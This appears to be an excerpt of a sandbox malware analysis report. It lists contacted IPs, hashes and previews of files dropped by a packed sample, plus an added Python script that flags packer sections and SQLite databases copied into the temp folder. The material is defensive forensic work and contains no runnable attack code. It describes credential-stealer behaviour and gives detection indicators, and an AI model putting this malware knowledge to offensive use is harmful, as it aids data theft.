                                                                                                                                                                                              • 88.99.66.31
                                                                                                                                                                                              Swift_Fattura_0093320128_.exe (verdict: malicious)
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
                                                                                                                                                                                              • 88.99.66.31
                                                                                                                                                                                              SecuriteInfo.com.Variant.Graftor.981190.24096.exe (verdict: malicious)
                                                                                                                                                                                              • 104.25.233.53
                                                                                                                                                                                              • 104.192.141.1
                                                                                                                                                                                              • 52.216.94.27
                                                                                                                                                                                              • 88.99.66.31

                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                              No context

                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1234.exe.log
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                                              Entropy (8bit):5.355304211458859
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                                                                                                                              MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                                                                                                                              SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                                                                                                                              SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                                                                                                                              SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):3859368
                                                                                                                                                                                              Entropy (8bit):7.912548851531853
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:98304:X5iEs4cCZTtmWfXuXv9KMXqRBEYSN2M5dqkkhLZ:oEs4cQxmCXQkMhUMPqkk1
                                                                                                                                                                                              MD5:D11C21AB3E969F79E3C783FDD97E1C10
                                                                                                                                                                                              SHA1:E6437317A778E824C277F417B535E7FD99E77195
                                                                                                                                                                                              SHA-256:55FC1FD18CB0DB330EA14022C094ED624579331D39DC07DA94E7965AA192A206
                                                                                                                                                                                              SHA-512:7043C2025857127C7BD57ABB294DACBEEE7A942D8E88A5AAC26412A0EDF257DE52F5BFA5C872625141E82D564C018250E8D200E8904546CD67A9C6EED5845FD0
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                              • Antivirus: Metadefender, Detection: 20%
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 36%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0......./......cm.. ...@....@.. ....................... ........;...@.................................:@3.P....`...............:............................................................................................. . ... ...................... ..` ../..@...D..................@..@ .....`2.....................@..@.vm_sec.......2.....................@....idata... ...@3.....................@....vimp0.......`3.....................`..`.themida.@8.. 5.....................`....boot........`m......@..............`..`.vimp0.......@........9............. ..`.rsrc.......`....... 9.............@..@................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp21B5.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp21B6.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp21D7.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp21D8.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
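Two of the dropped-file types above carry indicators worth reproducing offline rather than trusting the sandbox fields alone: the srvs.exe preview shows PE section names such as .vm_sec, .vimp0, .themida and .boot (typical of Themida/WinLicense-style protectors, which fits the report's "Detected unpacking" signature) together with an 8-bit entropy of 7.91, and the tmp21B5.tmp through tmp21D9.tmp files are identical SQLite 3.x databases written to %TEMP% by 1234.exe ("last written using SQLite version 3032001"), the pattern a credential stealer leaves when it copies a browser database before querying it (the report does not name the source database). The script below is an added example, not part of the Joe Sandbox report: it parses the PE section table and the SQLite header, recomputes the hashes and the 8-bit Shannon entropy the report lists, and flags the two indicators. The packer section-name list, the 7.5 entropy threshold and the two in-memory sample files are constructed assumptions for the demonstration.

```python
"""Offline triage of dropped files: reproduce the report's per-file fields
(hashes, size, 8-bit entropy, file type) and flag packer-style PE section
names and SQLite databases dropped into %TEMP%.
Added example, not part of the Joe Sandbox report."""
import hashlib
import math
import struct

# Assumption: illustrative list of section names left by Themida/WinLicense-style
# and other packers; the dotted names below appear in the srvs.exe preview.
PACKER_SECTION_NAMES = {
    b".themida", b".vm_sec", b".vimp0", b".boot", b".winlice",
    b".vmp0", b".vmp1", b"UPX0", b"UPX1",
}
HIGH_ENTROPY = 7.5                      # assumption: packed/encrypted PEs usually sit above this
SQLITE_MAGIC = b"SQLite format 3\x00"   # first 16 bytes of every SQLite 3 database


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the measure behind 'Entropy (8bit)'."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_section_names(data: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section table and return
    the 8-byte section names with NUL padding stripped; [] if not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00" or len(data) < e_lfanew + 24:
        return []
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", data, coff + 2)[0]        # NumberOfSections
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]   # SizeOfOptionalHeader
    table = coff + 20 + opt_size                               # section table follows the optional header
    names = []
    for i in range(nsec):
        off = table + 40 * i                                   # IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(data):
            break
        names.append(data[off:off + 8].rstrip(b"\x00"))
    return names


def sqlite_version_string(data: bytes) -> str:
    """Decode 'last written using SQLite version': big-endian u32 at header offset 96,
    encoded as X*1000000 + Y*1000 + Z, so 3032001 -> '3.32.1'."""
    v = struct.unpack_from(">I", data, 96)[0]
    return f"{v // 1000000}.{(v // 1000) % 1000}.{v % 1000}"


def triage(name: str, data: bytes) -> dict:
    """Produce a report-style record for one dropped file plus indicator flags."""
    rec = {
        "name": name,
        "size": len(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "entropy": round(shannon_entropy(data), 3),
        "file_type": "unknown",
        "indicators": [],
    }
    if data[:2] == b"MZ":
        names = pe_section_names(data)
        rec["file_type"] = "PE"
        rec["sections"] = [n.decode("ascii", "replace") for n in names]
        hits = sorted(n.decode("ascii", "replace") for n in names if n in PACKER_SECTION_NAMES)
        if hits:
            rec["indicators"].append("packer-sections:" + ",".join(hits))
        if rec["entropy"] > HIGH_ENTROPY:
            rec["indicators"].append("high-entropy")
    elif data.startswith(SQLITE_MAGIC):
        rec["file_type"] = "SQLite 3.x database"
        if len(data) >= 100:                                   # the SQLite header is 100 bytes
            rec["sqlite_version"] = sqlite_version_string(data)
        if name.lower().endswith(".tmp"):
            rec["indicators"].append("sqlite-copy-in-temp")
    return rec


def build_sample_pe(section_names) -> bytes:
    """Constructed sample: a PE32 header skeleton with the given section names and
    no code, just enough structure for pe_section_names(). Not a runnable executable."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\x00")
    opt_size = 0xE0                                            # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B).ljust(opt_size, b"\x00")    # PE32 magic, rest zeroed
    secs = b"".join(n.ljust(8, b"\x00") + b"\x00" * 32 for n in section_names)
    return dos + b"PE\x00\x00" + coff + opt + secs


def build_sample_sqlite(version=3032001) -> bytes:
    """Constructed sample: a 100-byte SQLite header carrying the version the report shows."""
    return SQLITE_MAGIC.ljust(96, b"\x00") + struct.pack(">I", version)


if __name__ == "__main__":
    for rec in (
        triage("srvs.exe", build_sample_pe([b".text", b".vm_sec", b".themida", b".boot"])),
        triage("tmp21B5.tmp", build_sample_sqlite()),
    ):
        print(rec)
```

Pointing `triage()` at real dropped files (`open(path, "rb").read()`) reproduces the MD5, SHA-256, size and entropy fields above; the sample PE skeleton keeps only the headers, so its entropy is low and only the section-name indicator fires, whereas a genuinely packed file like srvs.exe would also trip the entropy check.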
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp21D9.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp21DA.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp253A.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                              Entropy (8bit):4.685942106278079
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
                                                                                                                                                                                              MD5:3F6896A097F6B0AE6A2BF3826C813DFC
                                                                                                                                                                                              SHA1:951214AB37DEA766005DD981B0B3D61F936B035B
                                                                                                                                                                                              SHA-256:E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
                                                                                                                                                                                              SHA-512:C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp253B.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                              Entropy (8bit):4.6969712158039245
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
                                                                                                                                                                                              MD5:31CD00400A977C512B9F1AF51F2A5F90
                                                                                                                                                                                              SHA1:3A6B9ED88BD73091D5685A51CB4C8870315C4A81
                                                                                                                                                                                              SHA-256:E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
                                                                                                                                                                                              SHA-512:0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview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
C:\Users\user\AppData\Local\Temp\tmp253C.tmp
Process:C:\Users\user\AppData\Roaming\1234.exe
File Type:ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.702247102869977
Encrypted:false
SSDEEP:24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
MD5:B734D7226D90E4FD8228EE89C7DD26DA
SHA1:EDA7F371036A56A0DE687FF97B01F355C5060846
SHA-256:ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
SHA-512:D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
Malicious:false
Reputation:unknown
                                                                                                                                                                                              Preview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
C:\Users\user\AppData\Local\Temp\tmp256C.tmp
Process:C:\Users\user\AppData\Roaming\1234.exe
File Type:ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.69422273140364
Encrypted:false
SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:A686C2E2230002C3810CB3638589BF01
SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:false
Reputation:unknown
                                                                                                                                                                                              Preview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
C:\Users\user\AppData\Local\Temp\tmp256D.tmp
Process:C:\Users\user\AppData\Roaming\1234.exe
File Type:ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.685942106278079
Encrypted:false
SSDEEP:24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:false
Reputation:unknown
Preview: PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP
C:\Users\user\AppData\Local\Temp\tmp256E.tmp
Process:C:\Users\user\AppData\Roaming\1234.exe
File Type:ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.6969712158039245
Encrypted:false
SSDEEP:24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
MD5:31CD00400A977C512B9F1AF51F2A5F90
SHA1:3A6B9ED88BD73091D5685A51CB4C8870315C4A81
SHA-256:E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
SHA-512:0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
Malicious:false
Reputation:unknown
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmp256F.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1026
                                                                                                                                                                                              Entropy (8bit):4.702247102869977
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
                                                                                                                                                                                              MD5:B734D7226D90E4FD8228EE89C7DD26DA
                                                                                                                                                                                              SHA1:EDA7F371036A56A0DE687FF97B01F355C5060846
                                                                                                                                                                                              SHA-256:ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
                                                                                                                                                                                              SHA-512:D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
